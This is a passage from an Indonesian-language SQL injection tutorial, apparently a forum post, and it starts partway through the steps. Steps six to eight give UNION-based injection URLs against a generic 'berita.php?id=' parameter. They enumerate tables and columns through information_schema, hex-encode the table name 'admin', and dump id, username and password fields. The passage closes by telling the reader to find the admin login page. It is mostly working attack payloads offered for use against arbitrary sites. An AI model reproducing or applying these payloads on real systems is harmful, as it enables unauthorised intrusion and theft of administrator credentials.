[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka 1 .